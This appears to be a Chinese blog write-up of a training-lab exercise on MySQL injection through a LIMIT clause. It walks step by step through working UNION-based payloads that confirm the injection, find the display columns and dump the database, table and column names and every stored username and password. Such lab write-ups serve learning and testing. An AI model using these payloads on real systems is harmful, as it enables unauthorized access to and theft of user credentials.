五号黯区靶场 mysql 注入之limit注入记录

前言

感谢五号黯区团队。
limit 功能 通常在分页处
比如page 字段 可能存在

limit注入(不存在order by)

http://bug.cc:86/limit/limit.php?p=1
访问靶场如下图
在这里插入图片描述

原数据库语句如下

select * from users where id <= 100 limit $p,1 

p为传参点

1.1 当p 为1时 sql语句和回显为

select * from users where id <= 100 limit 1,1

id:2 username:Angelina password:I-kill-you 

1.2 测试是否存在sql注入

payload:输入2 --+

select * from users where id <= 100 limit 2 -- ,1

id:1 username:Dumb password:Dumb
id:2 username:Angelina password:I-kill-you 

如上 注释掉了 后边的,- 查询出两条数据
sql语句 执行成功 说明存在sql注入

1.3 测试回显位(limit注入后不能用order by 判断列数 )

payload:1,0 union select 1,2,3 --+

select * from users where id <= 100 limit 1,0 union select 1,2,3 – ,1

id:1 username:2 password:3

1.4 爆数据

select * from users where id <= 100 limit 1,0 union select 1,2,database() -- ,1

id:1 username:2 password:security 

select * from users where id <= 100 limit 1,0 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() -- ,1

id:1 username:2 password:emails,referers,uagents,users 

字段(两个语句锁定这个表)

select * from users where id <= 100 limit 1,0 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' and table_schema=database() -- ,1

id:1 username:2 password:id,username,password

字段值

select * from users where id <= 100 limit 1,0 union select 1,2,group_concat(username,0x7e,password) from security.users -- ,1

id:1 username:2 password:Dumb~Dumb,Angelina~I-kill-you,Dummy~p@ssword,secure~crappy,stupid~stupidity,superman~genious,batman~mob!le,admin~admin,admin1~admin1,admin2~admin2,admin3~admin3,dhakkan~dumbo,admin4~admin4

1.5 总结

回显 传入 2–+ 测试 就可以显示出3个字段

后续测法就和正常union 联合一样 但是不能用order by 判断数据列数

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值